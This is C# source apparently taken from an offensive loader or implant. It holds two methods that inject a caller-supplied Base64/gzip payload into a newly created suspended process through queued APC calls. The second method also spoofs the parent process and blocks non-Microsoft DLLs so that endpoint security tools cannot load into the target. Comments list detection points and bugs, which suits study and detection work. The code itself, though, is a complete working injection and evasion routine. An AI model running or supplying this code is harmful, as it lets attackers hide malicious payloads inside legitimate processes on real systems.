        /// <summary>
        /// Starts <c>arguments[2]</c> as a new process in the suspended state, copies the
        /// decoded payload from <c>arguments[1]</c> into that process, makes the copy
        /// executable and queues it as a user-mode APC on the initial thread before resuming it.
        /// From a detection standpoint the visible call chain — CreateProcess with
        /// CREATE_SUSPENDED, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx to an
        /// executable protection, QueueUserAPC, ResumeThread — is the classic
        /// cross-process APC injection sequence; the RW-to-RX change on memory written by
        /// another process and the APC queued to a suspended thread are the usual alert points.
        /// </summary>
        /// <param name="arguments">
        /// Positional arguments. Index 1 is a Base64 string of gzip-compressed payload
        /// bytes; index 2 is the target executable path with '+' standing in for spaces.
        /// Index 0 is never read. The array length is not checked, so fewer than three
        /// entries throw <see cref="IndexOutOfRangeException"/> before the try block.
        /// </param>
        /// <returns>
        /// Always <c>null</c>; every Win32 return value is discarded, so the caller cannot
        /// distinguish success from failure.
        /// </returns>
        public static string InjectAPC(string[] arguments)
        {
            // Caller-supplied path; '+' is decoded to ' ' and nothing else is validated.
            string targetProcess = arguments[2].Replace('+', ' ');

            // Payload decoded through a project helper that is not shown here.
            // NOTE(review): presumably no cap on the decompressed size — confirm in DecGzip.
            byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
            // lpNumberOfBytesWritten and lpThreadId are declared but never used below.
            IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
            IntPtr lpThreadId             = IntPtr.Zero;
            // Receives the previous page protection from VirtualProtectEx; never inspected.
            uint   oldProtect             = 0;

            // Left at its default field values; no attribute list is attached here even
            // though EXTENDED_STARTUPINFO_PRESENT is passed to CreateProcess below.
            STARTUPINFOEX si = new STARTUPINFOEX();

            // Filled by CreateProcess with the new process and primary-thread handles.
            flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();

            var processSecurity = new flags.SECURITY_ATTRIBUTES();
            var threadSecurity  = new flags.SECURITY_ATTRIBUTES();

            // The API expects nLength to hold the size of the structure.
            processSecurity.nLength = Marshal.SizeOf(processSecurity);
            threadSecurity.nLength  = Marshal.SizeOf(threadSecurity);

            // Pin the managed array so its address stays valid for WriteProcessMemory.
            GCHandle handle       = GCHandle.Alloc(buffer, GCHandleType.Pinned);
            IntPtr   pinnedBuffer = handle.AddrOfPinnedObject();

            try
            {
                // CREATE_SUSPENDED parks the initial thread before any user code runs.
                // 'success' is never checked, so a failed create continues with an empty 'pi'.
                bool   success      = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
                // Committed as read/write first; a zero (failed) result is not checked.
                IntPtr resultPtr    = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
                IntPtr bytesWritten = IntPtr.Zero;
                // Cross-process write of the payload; neither the result nor bytesWritten is checked.
                bool   resultBool   = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);

                // Second handle to the same primary thread (pi.hThread already refers to it),
                // opened with SET_CONTEXT access. Never closed on any path.
                IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);

                // RW -> RX transition on memory written from outside the process:
                // this is the protection change that memory-scanning and EDR hooks key on.
                resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);

                // Queue the written region as an APC routine; 'ptr' (the return value) is ignored.
                // NOTE(review): presumably the APC fires once the thread is resumed — not verified here.
                IntPtr ptr          = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
                IntPtr ThreadHandle = pi.hThread;
                Interop.ResumeThread(ThreadHandle);

                // Unpin the managed buffer. Not in a finally: if Free() itself throws,
                // the catch below calls Free() a second time, which throws InvalidOperationException.
                handle.Free();
            }
            catch (Exception ex)
            {
                // Catch-all that only prints the message; the failure is otherwise swallowed.
                handle.Free();
                Console.WriteLine(ex.Message);
            }

            // pi.hProcess, pi.hThread and sht are leaked on both the success and failure paths.
            return(null);
        }
        /// <summary>
        /// Same APC-injection sequence as the sibling APC method, but the new process is
        /// created through an extended startup attribute list that (a) reparents it under
        /// the PID returned by <c>SearchPID.SearchForPPID()</c> and (b) on 64-bit applies the
        /// <c>BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON</c> mitigation policy to it.
        /// For defenders: the reported parent of the resulting process is the spoofed one,
        /// so detection usually keys on the creator opening a handle to the chosen parent with
        /// CreateProcess/DuplicateHandle rights (line below), on a non-Microsoft parent
        /// creating a child with the signature mitigation enabled, and on the usual
        /// VirtualAllocEx / WriteProcessMemory / RW-to-RX / QueueUserAPC chain.
        /// </summary>
        /// <param name="arguments">
        /// Positional arguments. Index 1 is a Base64 string of gzip-compressed payload
        /// bytes; index 2 is the target executable path with '+' standing in for spaces.
        /// Index 0 is never read and the array length is not checked.
        /// </param>
        /// <returns>
        /// Always <c>null</c>; every Win32 return value is discarded, so the caller cannot
        /// distinguish success from failure.
        /// </returns>
        public static string InjectAPCPPID(string[] arguments)
        {
            // Caller-supplied path; '+' is decoded to ' ' and nothing else is validated.
            string targetProcess = arguments[2].Replace('+', ' ');

            // Payload decoded through a project helper that is not shown here.
            byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
            // Native cell holding the mitigation-policy value; allocated here and never freed.
            var    blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
            // PID that will be presented as the parent; chosen by a project helper not shown here.
            int    parentId = SearchPID.SearchForPPID();
            // lpNumberOfBytesWritten and lpThreadId are declared but never used below.
            IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
            IntPtr lpThreadId             = IntPtr.Zero;
            // Receives the previous page protection from VirtualProtectEx; never inspected.
            uint   oldProtect             = 0;
            // Native cell that will hold the parent process handle; allocated below and never freed.
            var    lpValueProc            = IntPtr.Zero;

            STARTUPINFOEX siEx = new STARTUPINFOEX();

            // Filled by CreateProcess with the new process and primary-thread handles.
            flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();

            var processSecurity = new flags.SECURITY_ATTRIBUTES();
            var threadSecurity  = new flags.SECURITY_ATTRIBUTES();

            // The API expects nLength to hold the size of the structure.
            processSecurity.nLength = Marshal.SizeOf(processSecurity);
            threadSecurity.nLength  = Marshal.SizeOf(threadSecurity);

            // Pin the managed array so its address stays valid for WriteProcessMemory.
            GCHandle handle       = GCHandle.Alloc(buffer, GCHandleType.Pinned);
            IntPtr   pinnedBuffer = handle.AddrOfPinnedObject();

            try
            {
                // Two-call pattern: the first call (null list) reports the required size,
                // the second initializes a list sized for 2 attributes. The HGlobal block is
                // never freed and DeleteProcThreadAttributeList is never called.
                var lpSize = IntPtr.Zero;
                Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
                siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
                Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);

                if (IntPtr.Size == 4)
                {
                    // 32-bit: a zero policy value, i.e. no mitigation is actually applied.
                    Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
                }
                else
                {
                    // 64-bit: child may only load Microsoft-signed binaries.
                    Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
                }

                // Attach the mitigation-policy attribute (dwFlags = 0). Return value ignored.
                Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
                // Handle to the chosen parent with exactly the rights reparenting needs.
                // This open is the observable event that reveals the real creator; the handle
                // is never checked for zero and never closed.
                var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId);
                lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
                Marshal.WriteIntPtr(lpValueProc, parentHandle);

                // Attach the parent-process attribute; the child will report parentId as its parent.
                Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

                // CREATE_SUSPENDED parks the initial thread before any user code runs.
                // 'success' is never checked, so a failed create continues with an empty 'pi'.
                bool   success      = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi);
                // Committed as read/write first; a zero (failed) result is not checked.
                IntPtr resultPtr    = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
                IntPtr bytesWritten = IntPtr.Zero;
                // Cross-process write of the payload; neither the result nor bytesWritten is checked.
                bool   resultBool   = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);

                // Second handle to the same primary thread (pi.hThread already refers to it),
                // opened with SET_CONTEXT access. Never closed on any path.
                IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);

                // RW -> RX transition on memory written from outside the process:
                // this is the protection change that memory-scanning and EDR hooks key on.
                resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);

                // Queue the written region as an APC routine; 'ptr' (the return value) is ignored.
                // NOTE(review): presumably the APC fires once the thread is resumed — not verified here.
                IntPtr ptr          = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
                IntPtr ThreadHandle = pi.hThread;
                Interop.ResumeThread(ThreadHandle);

                // Unpin the managed buffer. Not in a finally: if Free() itself throws,
                // the catch below calls Free() a second time, which throws InvalidOperationException.
                handle.Free();
            }
            catch (Exception ex)
            {
                // Catch-all that only prints the message; the failure is otherwise swallowed.
                handle.Free();
                Console.WriteLine(ex.Message);
            }

            // Leaked on every path: pi.hProcess, pi.hThread, sht, parentHandle, and the three
            // HGlobal blocks (blockMitigationPolicy, lpValueProc, siEx.lpAttributeList).
            return(null);
        }